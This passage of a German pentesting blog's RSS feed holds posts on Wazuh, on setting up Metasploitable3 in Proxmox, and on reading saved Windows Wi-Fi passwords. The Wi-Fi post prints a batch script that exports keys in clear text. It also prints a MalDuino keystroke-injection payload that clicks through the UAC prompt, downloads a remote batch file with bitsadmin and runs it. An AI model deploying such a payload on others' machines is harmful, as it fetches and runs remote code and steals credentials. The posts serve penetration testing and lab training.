				<category><![CDATA[Howto]]></category>
		<category><![CDATA[Malduino W]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Passwort]]></category>
		<category><![CDATA[UAC Bypass]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5147</guid>

					<description><![CDATA[<p>Es ist ein häufiges Szenario: Der Zugriff auf das eigene WLAN ist nicht mehr möglich, weil das Passwort vergessen wurde [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/malduino-w-wlan-passwoerter-auslesen/">MalDuino W &#8211; WLAN Passwörter auslesen</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Es ist ein häufiges Szenario: Der Zugriff auf das eigene WLAN ist nicht mehr möglich, weil das Passwort vergessen wurde und der Zugang über den Router nicht mehr hergestellt werden kann. Gerade in Zeiten, in denen wir immer mehr Geräte miteinander vernetzen, kann es frustrierend sein, wenn plötzlich ein wichtiger Zugang zu einem Netzwerk fehlt. Besonders problematisch wird es, wenn man auf einem Windows 11 Laptop das WLAN-Passwort auslesen muss, aber keinen direkten Zugriff mehr auf den Router hat.</p>



<p>Die gute Nachricht ist, dass es eine Möglichkeit gibt, dieses Passwort wiederherzustellen &#8211; und zwar mit einem Skript, das speziell für <a href="https://pentestit.de/erster-test-mit-malduiono-w-von-maltronics/">Penetrationstester</a> und IT-Experten entwickelt wurde. Mit diesem Skript kann das vergessene WLAN-Passwort ausgelesen werden, ohne dass der Router selbst zurückgesetzt oder neu konfiguriert werden muss.</p>



<p><strong>Das Problem:&nbsp;</strong></p>



<p>Windows 11 speichert WLAN-Passwörter in der Regel lokal im System, so dass sie nach der ersten Verbindung mit einem Netzwerk weiter verwendet werden können. Leider gibt es keine einfache, eingebaute Möglichkeit, diese Passwörter direkt anzuzeigen. Viele Benutzer geraten in Panik, wenn sie das Passwort vergessen haben und es keine Möglichkeit zu geben scheint, sich wieder mit dem Netzwerk zu verbinden.</p>



<p>Die Herausforderung für Penetration-Tester und IT-Experten ist es, diese Passwörter zu extrahieren, insbesondere wenn der physische Zugang zum Router nicht mehr möglich ist und der Nutzer keine anderen Sicherungskopien des Passworts besitzt.</p>



<p><strong>Die Lösung&nbsp;</strong></p>



<p>Genau für dieses Problem habe ich ein Skript entwickelt, das unter Windows 11 verwendet werden kann, um WLAN-Passwörter auszulesen. Das folgende Skript kann direkt auf dem Windows-PC ausgeführt werden. Dazu benötigt man Administratorrechte:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">@echo off
setlocal enabledelayedexpansion

REM Pfad zum Ordner, in dem die XML-Dateien gespeichert werden sollen
set "folderPath=%USERPROFILE%\WLANProfiles"

REM Erstellen des Ordners, falls er nicht existiert
if not exist "%folderPath%" mkdir "%folderPath%"

REM Exportieren der WLAN-Profile in den angegebenen Ordner
netsh wlan export profile folder="%folderPath%" key=clear

REM Durchsuchen Sie den angegebenen Ordner nach XML-Dateien
for %%f in ("%folderPath%\*.xml") do (
    REM Initialisieren einer Variable, um den keyMaterial-Wert zu speichern
    set "keyMaterial="

    REM Lesen der Datei zeilenweise
    for /f "tokens=*" %%l in ('type "%%f" ^| findstr /i "&lt;keyMaterial&gt;"') do (
        REM Extrahieren des Wertes zwischen den Tags
        set "line=%%l"
        set "line=!line:*&lt;keyMaterial&gt;=!"
        for /f "delims=&lt;" %%t in ("!line!") do (
            set "keyMaterial=%%t"
        )
    )

    REM Anzeigen des extrahierten keyMaterial-Wertes
    if defined keyMaterial (
        echo keyMaterial in %%~nxf: !keyMaterial!
    )
)

endlocal
pause</code></pre>



<p>Wer einen <a href="https://maltronics.com/products/malduino-w">MalDuinow W</a> zur Hand hat, kann auch eines der beiden Skripte verwenden, die auf Github abgelegt sind. Dabei wird die Batch-Datei direkt von <a href="https://github.com/eaglefn/malduinow">Github</a> heruntergeladen und auf dem PC ausgeführt. Dazu wird entweder die Kommandozeile oder die PowerShell verwendet. Hier die Version über die Kommandozeile:</p>



<pre class="wp-block-code"><code lang="adoc" class="language-adoc">REM ------------------------------------------------------------------------------------------------------
REM                                       Cmd Edition
REM  The script automates the process of downloading and executing a batch 
REM  file that retrieves Wi-Fi passwords stored on the system. It runs in the 
REM  currently logged-in Windows profile and displays the retrieved passwords 
REM  on the screen. The script uses keystrokes to run the necessary commands
REM  and visually indicates progress with LED color changes.
REM Pentestit.de - Frank Neugebauer (2025-03-25)
REM Currently supported layouts: DE, GB, US, ES, FR, DK, RU
REM Change language in the first line
REM -----------------------------------------------------------------------------------------------------
LOCALE DE
DEFAULTDELAY 2000
REM LED off
LED 0 0 0
REM LED red
LED 255 0 0
REM Run cmd as Administrator
GUI r
REM LED blue
LED 0 0 255
STRING cmd
CTRL SHIFT ENTER
TAB
TAB
TAB
ENTER
STRING bitsadmin /transfer mydownloadjob /download /priority high "https://raw.githubusercontent.com/eaglefn/malduinow/refs/heads/main/wifi_key_grabber.bat" %temp%\wifi.bat
ENTER
STRING cd %temp%
ENTER
STRING wifi.bat
ENTER
REM LED green
LED 0 255 0</code></pre>



<p>Beide Skripte nutzen Windows-Tools, um gespeicherte WLAN-Passwörter aufzulisten und anzuzeigen.</p>



<p>Mit diesem Ansatz können Penetrationstester und IT-Profis schnell und sicher auf gespeicherte WLAN-Passwörter zugreifen &#8211; ohne dass der Router zurückgesetzt oder die Verbindung manuell wiederhergestellt werden muss.</p>
<p>Der Beitrag <a href="https://pentestit.de/malduino-w-wlan-passwoerter-auslesen/">MalDuino W &#8211; WLAN Passwörter auslesen</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz</title>
		<link>https://pentestit.de/ix-01-2025-wazuh-freie-sicherheitsplattform-wazuh-im-einsatz/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sun, 29 Dec 2024 10:32:33 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[iX]]></category>
		<category><![CDATA[iX Magazin]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5144</guid>

					<description><![CDATA[<p>Wazuh ist eine lizenzkostenfreie und quelloffene Sicherheitsplattform, die Extended Detection and Response (XDR) und Security Information and Event Management (SIEM) [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-01-2025-wazuh-freie-sicherheitsplattform-wazuh-im-einsatz/">iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Wazuh ist eine lizenzkostenfreie und quelloffene Sicherheitsplattform, die Extended Detection and Response (XDR) und Security Information and Event Management (SIEM) kombiniert. Mittlerweile wird sie von einer weltweiten Open-Source-Sicherheits-Community unterstützt, die dem Entwicklungsteam zur Seite steht und so zum Erfolg des Projekts beiträgt. Die Plattform vereint verschiedene Sicherheitsfunktionen wie Intrusion Detection, Log Management, Compliance Management und Vulnerability Management in einem System. Diese Vielzahl an Funktionen kann überwältigend sein. Dieser zweite Teil der Artikelserie begleitet beim Einstieg in den praktischen Einsatz von Wazuh im Unternehmen. <a href="https://www.heise.de/select/ix/2025/1/2429811514830053491">Jetzt Teil 2 lesen!</a></p>



<p></p>
<p>Der Beitrag <a href="https://pentestit.de/ix-01-2025-wazuh-freie-sicherheitsplattform-wazuh-im-einsatz/">iX 01/2025 – Wazuh: Freie Sicherheitsplattform Wazuh im Einsatz</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source</title>
		<link>https://pentestit.de/ix-12-2024-wazuh-unternehmenssicherheit-mit-open-source/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Sun, 24 Nov 2024 09:50:15 +0000</pubDate>
				<category><![CDATA[Bücher und Artikel]]></category>
		<category><![CDATA[iX Magazin]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5141</guid>

					<description><![CDATA[<p>Die Open-Source-Sicherheitsplattform Wazuh unterscheidet sich von anderen Open-Source-Tools durch die vollständige Integration verschiedener Sicherheitsfunktionen wie Host-Monitoring mit IDS OSSEC oder [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/ix-12-2024-wazuh-unternehmenssicherheit-mit-open-source/">iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Die Open-Source-Sicherheitsplattform Wazuh unterscheidet sich von anderen Open-Source-Tools durch die vollständige Integration verschiedener Sicherheitsfunktionen wie Host-Monitoring mit IDS OSSEC oder die Analysemöglichkeiten von Elastic Stack, erweitert um Schwachstellenmanagement, Compliance-Überwachung und vieles mehr. Mit Wazuh kann ein Unternehmen eine leistungsfähige und flexible IT-Sicherheitsinfrastruktur aufbauen, ohne mehrere separate Tools verwalten zu müssen. Der&nbsp;<a href="https://www.heise.de/ratgeber/Wazuh-Unternehmenssicherheit-mit-Open-Source-gewaehrleisten-10008627.html">erste Teil dieser&nbsp;</a>zweiteiligen Artikelserie erläutert das Zusammenspiel der Wazuh-Komponenten, die Funktionen des Dashboards und die Anbindung von Endpunkten.&nbsp;</p>



<p>Es folgt ein zweiter Teil im nächsten Heft. Viele weitere interessante Artikel finden Sie&nbsp;<a href="https://www.heise.de/select/ix/2024/12">im aktuellen Heft</a>.</p>



<figure class="wp-block-image size-large"><a href="https://www.heise.de/select/ix/2024/12"><img loading="lazy" decoding="async" width="1024" height="1024" src="https://pentestit.de/wp-content/uploads/2024/11/1732440372-1024x1024.jpg" alt="" class="wp-image-5142" srcset="https://pentestit.de/wp-content/uploads/2024/11/1732440372-1024x1024.jpg 1024w, https://pentestit.de/wp-content/uploads/2024/11/1732440372-150x150.jpg 150w, https://pentestit.de/wp-content/uploads/2024/11/1732440372-300x300.jpg 300w, https://pentestit.de/wp-content/uploads/2024/11/1732440372-768x768.jpg 768w, https://pentestit.de/wp-content/uploads/2024/11/1732440372.jpg 1500w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></a></figure>
<p>Der Beitrag <a href="https://pentestit.de/ix-12-2024-wazuh-unternehmenssicherheit-mit-open-source/">iX 12/2024 – Wazuh: Unternehmenssicherheit mit Open Source</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Metasploitable3-VMs für Ubuntu und Windows in Proxmox einrichten</title>
		<link>https://pentestit.de/metasploitable3-vms-fuer-ubuntu-und-windows-in-proxmox-einrichten/</link>
					<comments>https://pentestit.de/metasploitable3-vms-fuer-ubuntu-und-windows-in-proxmox-einrichten/#respond</comments>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Tue, 22 Oct 2024 12:25:43 +0000</pubDate>
				<category><![CDATA[Howto]]></category>
		<category><![CDATA[Metasploit]]></category>
		<category><![CDATA[Metasploit-Framework]]></category>
		<category><![CDATA[Metasploitable3]]></category>
		<category><![CDATA[Penetration Testing]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5130</guid>

					<description><![CDATA[<p>Die Einrichtung von Metasploitable3 ist eine ausgezeichnete Methode, um in die Welt der Cybersicherheit und des Pentesting einzutauchen. Metasploitable3 ist [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/metasploitable3-vms-fuer-ubuntu-und-windows-in-proxmox-einrichten/">Metasploitable3-VMs für Ubuntu und Windows in Proxmox einrichten</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p>Die Einrichtung von <a href="https://github.com/rapid7/metasploitable3">Metasploitable3</a> ist eine ausgezeichnete Methode, um in die Welt der Cybersicherheit und des Pentesting einzutauchen. Metasploitable3 ist eine virtuelle Maschine, die entwickelt wurde, um Schwachstellen zu simulieren, die zu Test- und Schulungszwecken ausgenutzt werden können. In diesem Blogpost erkläre ich Schritt für Schritt, wie Sie Metasploitable3 sowohl auf einem Ubuntu- als auch auf einem Windows-System einrichten können.</p>



<h3 class="wp-block-heading"><strong>Voraussetzungen</strong></h3>



<p>Bevor wir beginnen, stellen Sie sicher, dass Ihr System über folgende Software verfügt:</p>



<ul class="wp-block-list">
<li>Ubuntu-System mit Root-Zugriff</li>



<li>Netzwerkzugriff auf den Proxmox-Server</li>



<li>Vagrant und VirtualBox installiert</li>
</ul>



<h3 class="wp-block-heading"><strong>Schritt-für-Schritt-Anleitung</strong></h3>



<h4 class="wp-block-heading"><strong>1. System vorbereiten</strong></h4>



<p>Zunächst einmal ist es wichtig, das System auf den neuesten Stand zu bringen und alle notwendigen Updates zu installieren:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">sudo apt update &amp;&amp; sudo apt upgrade -y</code></pre>



<h4 class="wp-block-heading"><strong>2. Vagrant und VirtualBox installieren</strong></h4>



<p>Für die Erstellung von Metasploitable3 verwenden wir Vagrant und VirtualBox:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">sudo apt install vagrant virtualbox</code></pre>



<h4 class="wp-block-heading"><strong>3. Zusätzliche Pakete für Windows-Kompatibilität installieren</strong></h4>



<p>Damit Vagrant mit Windows-Gästen umgehen kann, müssen einige Ruby-Gems installiert werden:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">sudo gem install winrm winrm-fs winrm-elevated</code></pre>



<h4 class="wp-block-heading"><strong>4. Arbeitsverzeichnis erstellen</strong></h4>



<p>Erstellen Sie als nächstes ein Arbeitsverzeichnis für Metasploitable3 und wechseln Sie in dieses Verzeichnis:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">mkdir metasploitable3-workspace
cd metasploitable3-workspace</code></pre>



<h4 class="wp-block-heading"><strong>5. Vagrantfile herunterladen und die VMs starten</strong></h4>



<p>Das Vagrantfile wird verwendet, um die Konfiguration für Metasploitable3 herunterzuladen und zu starten:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">curl -O https://raw.githubusercontent.com/rapid7/metasploitable3/master/Vagrantfile &amp;&amp; vagrant up</code></pre>



<h4 class="wp-block-heading"><strong>6. Vagrant-Boxen hinzufügen</strong></h4>



<p>Die Vagrant-Boxen für Ubuntu und Windows werden heruntergeladen und hinzugefügt:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">vagrant box add rapid7/metasploitable3-win2k8 --force
vagrant box add rapid7/metasploitable3-ub1404 --force</code></pre>



<h4 class="wp-block-heading"><strong>7. Verzeichnisse auf dem Proxmox-Server einrichten</strong></h4>



<p>Wechseln Sie nun zu Ihrem Proxmox-Server, um Verzeichnisse für die beiden VMs einzurichten:</p>



<pre class="wp-block-code"><code lang="bash" class="language-bash">cd /home
mkdir win2k8
mkdir ub1404</code></pre>



<h4 class="wp-block-heading"><strong>8. Dateien zum Proxmox-Server kopieren</strong></h4>



<p>Wechseln Sie in die entsprechenden Verzeichnisse auf Ihrem lokalen System, um die Dateien auf den Proxmox-Server zu kopieren. Beachten Sie, dass <code>/home/&lt;BENUTZERNAME&gt;</code> Ihr persönliches Benutzerverzeichnis ist, das auf Ihrem System möglicherweise anders heißt. Ebenso muss die IP-Adresse des Proxmox-Servers (<code>&lt;PROXMOX-SERVER-IP&gt;</code>) entsprechend Ihrer Netzwerkkonfiguration angepasst werden:</p>



<ul class="wp-block-list">
<li><strong>Ubuntu-VM-Dateien kopieren</strong></li>
</ul>



<pre class="wp-block-code"><code lang="bash" class="language-bash">  cd /home/&lt;BENUTZERNAME&gt;/.vagrant.d/boxes/rapid7-VAGRANTSLASH-metasploitable3-ub1404/0.1.12-weekly/virtualbox
  scp * root@&lt;PROXMOX-SERVER-IP&gt;:/home/ub1404</code></pre>



<ul class="wp-block-list">
<li><strong>Windows-VM-Dateien kopieren</strong></li>
</ul>



<pre class="wp-block-code"><code lang="bash" class="language-bash">  cd /home/&lt;BENUTZERNAME&gt;/.vagrant.d/boxes/rapid7-VAGRANTSLASH-metasploitable3-win2k8/0.1.0-weekly/virtualbox
  scp * root@&lt;PROXMOX-SERVER-IP&gt;:/home/win2k8</code></pre>



<h4 class="wp-block-heading"><strong>9. Dateien auf dem Proxmox-Server konvertieren</strong></h4>



<p>Die kopierten Dateien müssen auf dem Proxmox-Server konvertiert werden, um die virtuellen Maschinen zu erstellen. Beachten Sie hierbei, dass die IDs der virtuellen Maschinen (<code>&lt;VM-ID-UBUNTU&gt;</code> und <code>&lt;VM-ID-WINDOWS&gt;</code>) entsprechend Ihrer Proxmox-Konfiguration angepasst werden müssen. In unserem Test haben wir die IDs <code>207</code> für Ubuntu und <code>208</code> für Windows verwendet. Passen Sie diese Werte an, je nachdem, welche IDs auf Ihrem System verfügbar sind:</p>



<ul class="wp-block-list">
<li><strong>Ubuntu-VM konvertieren</strong></li>
</ul>



<pre class="wp-block-code"><code lang="bash" class="language-bash">  qm importovf &lt;VM-ID-UBUNTU&gt; box.ovf local-lvm
  qm importdisk &lt;VM-ID-UBUNTU&gt; metasploitable3-ub1404-disk001.vmdk local-lvm -format qcow2</code></pre>



<ul class="wp-block-list">
<li><strong>Windows-VM konvertieren</strong></li>
</ul>



<pre class="wp-block-code"><code lang="bash" class="language-bash">  qm importovf &lt;VM-ID-WINDOWS&gt; box.ovf local-lvm
  qm importdisk &lt;VM-ID-WINDOWS&gt; metasploitable3-win2k8-disk001.vmdk local-lvm -format qcow2</code></pre>



<h4 class="wp-block-heading"><strong>10. Login-Daten</strong></h4>



<p>Um sich auf den virtuellen Maschinen einzuloggen, verwenden Sie folgende Zugangsdaten:</p>



<ul class="wp-block-list">
<li><strong>Benutzername:</strong> vagrant</li>



<li><strong>Passwort:</strong> vagrant</li>
</ul>



<h3 class="wp-block-heading"><strong>Fazit</strong></h3>



<p>Mit dieser Anleitung haben Sie die virtuellen Maschinen für Metasploitable3 erfolgreich eingerichtet. Diese Umgebung eignet sich perfekt für die Simulation von Angriffen, um Ihre Kenntnisse im Bereich der Cybersicherheit zu erweitern.</p>



<p>Denken Sie daran, die Hardwarekonfiguration der angelegten virtuellen Maschinen anzupassen, um eine optimale Performance zu gewährleisten:</p>



<ul class="wp-block-list">
<li><strong>Ubuntu-VM</strong>: Passen Sie die Anzahl der zugewiesenen CPUs und die Menge des verfügbaren Arbeitsspeichers an, um sicherzustellen, dass die VM flüssig läuft. Je nach Systemressourcen empfiehlt es sich, mindestens 2 CPUs und 2 GB RAM zuzuweisen. Wählen Sie als OS-Typ Linux 6.x &#8211; 2.6 Kernel  aus und passen ggf. die Boot-Reihenfolge an.</li>



<li><strong>Windows-VM</strong>: Da Windows im Allgemeinen mehr Ressourcen benötigt, sollten Sie die Anzahl der CPUs auf mindestens 2-4 und den Arbeitsspeicher auf mindestens 4 GB erhöhen, um eine akzeptable Leistung zu erzielen. Wählen Sie als OS-Typ MS-Windows7/2008r2 aus und passen ggf. die Boot-Reihenfolge an.</li>
</ul>



<p>Unsere Hardwareeinstellungen der VM finden Sie in den folgenden Screenshots:</p>



<p><strong>WIndows-VM:</strong></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="397" src="https://pentestit.de/wp-content/uploads/2024/10/WIndows-vm-1024x397.png" alt="" class="wp-image-5133" srcset="https://pentestit.de/wp-content/uploads/2024/10/WIndows-vm-1024x397.png 1024w, https://pentestit.de/wp-content/uploads/2024/10/WIndows-vm-300x116.png 300w, https://pentestit.de/wp-content/uploads/2024/10/WIndows-vm-768x298.png 768w, https://pentestit.de/wp-content/uploads/2024/10/WIndows-vm.png 1398w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p><strong>Ubuntu-VM:</strong></p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="311" src="https://pentestit.de/wp-content/uploads/2024/10/Linux-vm-1024x311.png" alt="" class="wp-image-5134" srcset="https://pentestit.de/wp-content/uploads/2024/10/Linux-vm-1024x311.png 1024w, https://pentestit.de/wp-content/uploads/2024/10/Linux-vm-1536x467.png 1536w, https://pentestit.de/wp-content/uploads/2024/10/Linux-vm-300x91.png 300w, https://pentestit.de/wp-content/uploads/2024/10/Linux-vm-768x233.png 768w, https://pentestit.de/wp-content/uploads/2024/10/Linux-vm.png 1612w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p>Vergessen Sie nicht, den Qemu-Guest-Agenten in den virtuellen Umgebungen zu installieren.</p>



<p></p>
<p>Der Beitrag <a href="https://pentestit.de/metasploitable3-vms-fuer-ubuntu-und-windows-in-proxmox-einrichten/">Metasploitable3-VMs für Ubuntu und Windows in Proxmox einrichten</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://pentestit.de/metasploitable3-vms-fuer-ubuntu-und-windows-in-proxmox-einrichten/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Open-Source-Plattform Wazuh</title>
		<link>https://pentestit.de/open-source-plattform-wazuh/</link>
		
		<dc:creator><![CDATA[Frank Neugebauer]]></dc:creator>
		<pubDate>Thu, 26 Sep 2024 13:38:59 +0000</pubDate>
				<category><![CDATA[Howto]]></category>
		<category><![CDATA[Open Source]]></category>
		<category><![CDATA[SIEM]]></category>
		<category><![CDATA[Threat Detection]]></category>
		<category><![CDATA[Threat Hunting]]></category>
		<category><![CDATA[Vulnerability Detection]]></category>
		<category><![CDATA[Wazuh]]></category>
		<guid isPermaLink="false">https://pentestit.de/?p=5120</guid>

					<description><![CDATA[<p>Wazuh ist eine leistungsstarke Open-Source-Plattform, die Unternehmen umfassende Sicherheitsfunktionen wie Log-Analyse, Intrusion Detection und Schwachstellenmanagement bietet. Sie ermöglicht eine effektive [&#8230;]</p>
<p>Der Beitrag <a href="https://pentestit.de/open-source-plattform-wazuh/">Open-Source-Plattform Wazuh</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p><a href="https://wazuh.com">Wazuh </a>ist eine leistungsstarke Open-Source-Plattform, die Unternehmen umfassende Sicherheitsfunktionen wie Log-Analyse, Intrusion Detection und Schwachstellenmanagement bietet. Sie ermöglicht eine effektive Überwachung der IT-Infrastruktur und unterstützt die Einhaltung wichtiger Sicherheitsstandards. Einer der größten Vorteile von Wazuh ist seine Flexibilität. Die Plattform lässt sich an spezifische Bedürfnisse anpassen und bietet zahlreiche Integrationsmöglichkeiten mit anderen Tools. Durch die Open-Source-Natur entfallen zudem Lizenzkosten, was die Lösung besonders für Organisationen mit begrenztem Budget attraktiv macht. Auch die Skalierbarkeit ist ein Pluspunkt: Wazuh kann sowohl On-Premises als auch in der Cloud oder in Containern betrieben werden, was es Unternehmen ermöglicht, die Plattform je nach Größe und Komplexität der IT-Umgebung anzupassen. Wazuh ist gut <a href="https://documentation.wazuh.com/current/index.html">dokumentiert </a>und in vielen Beispielen beschrieben. </p>



<p>Dennoch gibt es einige Nachteile bei der Nutzung von Wazuh. Die Implementierung und Konfiguration der Plattform ist komplex und erfordert technisches Know-how. Die Benutzeroberfläche ist nicht immer intuitiv, was zu einer steilen Lernkurve führen kann. Darüber hinaus kann die ressourcenintensive Verarbeitung großer Datenmengen die Systemleistung beeinträchtigen, was gerade in großen Umgebungen zu einem Problem werden kann. Ein weiterer Aspekt ist der fehlende professionelle Support: Im Gegensatz zu kommerziellen Lösungen müssen sich Nutzer bei Problemen auf die Community verlassen. Auch die regelmäßige Feinabstimmung der Regeln zur Vermeidung von Fehlalarmen ist erforderlich, um die Effektivität der Plattform zu gewährleisten. Zudem kann die Skalierbarkeit von Wazuh in sehr großen Umgebungen an ihre Grenzen stoßen, was eine kontinuierliche Wartung und Optimierung der Systemleistung notwendig macht.</p>



<p>Insgesamt bietet Wazuh eine umfassende Lösung für die Sicherheitsüberwachung, die jedoch sorgfältige Planung und konstante Betreuung erfordert, um ihre vollen Potenziale auszuschöpfen und gleichzeitig die genannten Herausforderungen zu meistern.</p>



<p>Nachfolgend einige Screenshot der leistungsstarken Open-Source-Plattform:</p>



<h3 class="wp-block-heading"><strong>Wazuh Übersichts-Dashboard</strong></h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="845" src="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.06-1024x845.jpg" alt="" class="wp-image-5122" srcset="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.06-1024x845.jpg 1024w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.06-1536x1267.jpg 1536w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.06-2048x1689.jpg 2048w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.06-300x247.jpg 300w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.06-768x633.jpg 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<h3 class="wp-block-heading"><strong>Schwachstellenerkennung</strong></h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="653" src="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.44-1024x653.png" alt="" class="wp-image-5123" srcset="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.44-1024x653.png 1024w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.44-1536x979.png 1536w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.44-2048x1306.png 2048w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.44-300x191.png 300w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.01.44-768x490.png 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<h3 class="wp-block-heading"><strong>Threat Hunting</strong></h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="756" src="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.17-1024x756.png" alt="" class="wp-image-5124" srcset="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.17-1024x756.png 1024w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.17-1536x1133.png 1536w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.17-2048x1511.png 2048w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.17-300x221.png 300w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.17-768x567.png 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<h3 class="wp-block-heading"><strong>MITRE ATTACK Framework</strong></h3>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="599" src="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.37-1024x599.png" alt="" class="wp-image-5125" srcset="https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.37-1024x599.png 1024w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.37-1536x899.png 1536w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.37-2048x1198.png 2048w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.37-300x176.png 300w, https://pentestit.de/wp-content/uploads/2024/09/Bildschirmfoto-2024-09-26-um-15.02.37-768x449.png 768w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>



<p></p>
<p>Der Beitrag <a href="https://pentestit.de/open-source-plattform-wazuh/">Open-Source-Plattform Wazuh</a> erschien zuerst auf <a href="https://pentestit.de"></a>.</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
